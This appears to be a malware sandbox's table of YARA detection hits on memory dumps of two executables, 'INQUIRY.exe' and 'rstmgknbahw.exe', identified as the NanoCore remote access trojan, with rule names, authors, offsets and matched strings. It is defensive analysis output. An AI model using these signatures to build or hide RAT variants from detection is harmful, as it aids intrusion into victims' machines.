2.0.INQUIRY.exe.400000.9.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
3.2.rstmgknbahw.exe.2311458.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.2.rstmgknbahw.exe.2311458.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
3.2.rstmgknbahw.exe.2311458.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.2.rstmgknbahw.exe.2311458.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
6.2.rstmgknbahw.exe.400000.0.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x251e5:$x1: NanoCore.ClientPluginHost 0x25222:$x2: IClientNetworkHost 0x28d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.2.rstmgknbahw.exe.400000.0.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x24f5d:$x1: NanoCore Client.exe 0x251e5:$x2: NanoCore.ClientPluginHost 0x2681e:$s1: PluginCommand 0x26812:$s2: FileCommand 0x276c3:$s3: PipeExists 0x2d47a:$s4: PipeCreated 0x2520f:$s5: IClientLoggingHost
6.2.rstmgknbahw.exe.400000.0.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.rstmgknbahw.exe.400000.0.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x24f4d:$a: NanoCore 0x24f5d:$a: NanoCore 0x25191:$a: NanoCore 0x251a5:$a: NanoCore 0x251e5:$a: NanoCore 0x24fac:$b: ClientPlugin 0x251ae:$b: ClientPlugin 0x251ee:$b: ClientPlugin 0x250d3:$c: ProjectData 0x25ada:$d: DESCrypto 0x2d4a6:$e: KeepAlive 0x2b494:$g: LogClientMessage 0x2768f:$i: get_Connected 0x25e10:$j: #=q 0x25e40:$j: #=q 0x25e5c:$j: #=q 0x25e8c:$j: #=q 0x25ea8:$j: #=q 0x25ec4:$j: #=q 0x25ef4:$j: #=q 0x25f10:$j: #=q
2.0.INQUIRY.exe.400000.11.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
2.0.INQUIRY.exe.400000.11.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
2.0.INQUIRY.exe.400000.11.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.0.INQUIRY.exe.400000.11.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
6.0.rstmgknbahw.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x85e5:$x1: NanoCore.ClientPluginHost 0x8622:$x2: IClientNetworkHost 0xc155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.0.rstmgknbahw.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x835d:$x1: NanoCore Client.exe 0x85e5:$x2: NanoCore.ClientPluginHost 0x9c1e:$s1: PluginCommand 0x9c12:$s2: FileCommand 0xaac3:$s3: PipeExists 0x1087a:$s4: PipeCreated 0x860f:$s5: IClientLoggingHost
6.0.rstmgknbahw.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.0.rstmgknbahw.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x834d:$a: NanoCore 0x835d:$a: NanoCore 0x8591:$a: NanoCore 0x85a5:$a: NanoCore 0x85e5:$a: NanoCore 0x83ac:$b: ClientPlugin 0x85ae:$b: ClientPlugin 0x85ee:$b: ClientPlugin 0x84d3:$c: ProjectData 0x8eda:$d: DESCrypto 0x108a6:$e: KeepAlive 0xe894:$g: LogClientMessage 0xaa8f:$i: get_Connected 0x9210:$j: #=q 0x9240:$j: #=q 0x925c:$j: #=q 0x928c:$j: #=q 0x92a8:$j: #=q 0x92c4:$j: #=q 0x92f4:$j: #=q 0x9310:$j: #=q
2.2.INQUIRY.exe.24e0000.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
2.2.INQUIRY.exe.24e0000.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
2.2.INQUIRY.exe.24e0000.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.2.INQUIRY.exe.24e0000.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
2.0.INQUIRY.exe.415058.12.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
2.0.INQUIRY.exe.415058.12.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
2.0.INQUIRY.exe.415058.12.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.0.INQUIRY.exe.415058.12.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
1.2.INQUIRY.exe.22e0000.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1d9e5:$x1: NanoCore.ClientPluginHost 0x1da22:$x2: IClientNetworkHost 0x21555:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.2.INQUIRY.exe.22e0000.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1d75d:$x1: NanoCore Client.exe 0x1d9e5:$x2: NanoCore.ClientPluginHost 0x1f01e:$s1: PluginCommand 0x1f012:$s2: FileCommand 0x1fec3:$s3: PipeExists 0x25c7a:$s4: PipeCreated 0x1da0f:$s5: IClientLoggingHost
1.2.INQUIRY.exe.22e0000.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.INQUIRY.exe.22e0000.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1d74d:$a: NanoCore 0x1d75d:$a: NanoCore 0x1d991:$a: NanoCore 0x1d9a5:$a: NanoCore 0x1d9e5:$a: NanoCore 0x1d7ac:$b: ClientPlugin 0x1d9ae:$b: ClientPlugin 0x1d9ee:$b: ClientPlugin 0x1d8d3:$c: ProjectData 0x1e2da:$d: DESCrypto 0x25ca6:$e: KeepAlive 0x23c94:$g: LogClientMessage 0x1fe8f:$i: get_Connected 0x1e610:$j: #=q 0x1e640:$j: #=q 0x1e65c:$j: #=q 0x1e68c:$j: #=q 0x1e6a8:$j: #=q 0x1e6c4:$j: #=q 0x1e6f4:$j: #=q 0x1e710:$j: #=q
2.2.INQUIRY.exe.400000.0.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x251e5:$x1: NanoCore.ClientPluginHost 0x25222:$x2: IClientNetworkHost 0x28d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
2.2.INQUIRY.exe.400000.0.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x24f5d:$x1: NanoCore Client.exe 0x251e5:$x2: NanoCore.ClientPluginHost 0x2681e:$s1: PluginCommand 0x26812:$s2: FileCommand 0x276c3:$s3: PipeExists 0x2d47a:$s4: PipeCreated 0x2520f:$s5: IClientLoggingHost
2.2.INQUIRY.exe.400000.0.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.2.INQUIRY.exe.400000.0.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x24f4d:$a: NanoCore 0x24f5d:$a: NanoCore 0x25191:$a: NanoCore 0x251a5:$a: NanoCore 0x251e5:$a: NanoCore 0x24fac:$b: ClientPlugin 0x251ae:$b: ClientPlugin 0x251ee:$b: ClientPlugin 0x250d3:$c: ProjectData 0x25ada:$d: DESCrypto 0x2d4a6:$e: KeepAlive 0x2b494:$g: LogClientMessage 0x2768f:$i: get_Connected 0x25e10:$j: #=q 0x25e40:$j: #=q 0x25e5c:$j: #=q 0x25e8c:$j: #=q 0x25ea8:$j: #=q 0x25ec4:$j: #=q 0x25ef4:$j: #=q 0x25f10:$j: #=q
1.2.INQUIRY.exe.22f1458.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.2.INQUIRY.exe.22f1458.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
1.2.INQUIRY.exe.22f1458.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.INQUIRY.exe.22f1458.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
2.2.INQUIRY.exe.2921548.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
2.2.INQUIRY.exe.2921548.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
6.2.rstmgknbahw.exe.415058.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.2.rstmgknbahw.exe.415058.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
6.2.rstmgknbahw.exe.415058.1.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.rstmgknbahw.exe.415058.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
6.2.rstmgknbahw.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.2.rstmgknbahw.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
6.2.rstmgknbahw.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.rstmgknbahw.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
4.0.rstmgknbahw.exe.415058.12.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.0.rstmgknbahw.exe.415058.12.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
4.0.rstmgknbahw.exe.415058.12.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.0.rstmgknbahw.exe.415058.12.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
6.0.rstmgknbahw.exe.400000.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.0.rstmgknbahw.exe.400000.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
6.0.rstmgknbahw.exe.400000.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.0.rstmgknbahw.exe.400000.6.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
6.0.rstmgknbahw.exe.415058.12.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.0.rstmgknbahw.exe.415058.12.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
6.0.rstmgknbahw.exe.415058.12.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.0.rstmgknbahw.exe.415058.12.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
2.2.INQUIRY.exe.39a98c0.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
2.2.INQUIRY.exe.39a98c0.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
2.2.INQUIRY.exe.39a98c0.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.rstmgknbahw.exe.2510000.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.rstmgknbahw.exe.2510000.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
4.2.rstmgknbahw.exe.2510000.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.rstmgknbahw.exe.2510000.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
4.2.rstmgknbahw.exe.395543d.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x23c30:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x23c5d:$x2: IClientNetworkHost
4.2.rstmgknbahw.exe.395543d.7.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x23c30:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x24d0b:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x23c4a:$s5: IClientLoggingHost
4.2.rstmgknbahw.exe.395543d.7.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.1.rstmgknbahw.exe.415058.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.1.rstmgknbahw.exe.415058.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
6.1.rstmgknbahw.exe.415058.1.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.1.rstmgknbahw.exe.415058.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
2.0.INQUIRY.exe.415058.10.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
2.0.INQUIRY.exe.415058.10.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
2.0.INQUIRY.exe.415058.10.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
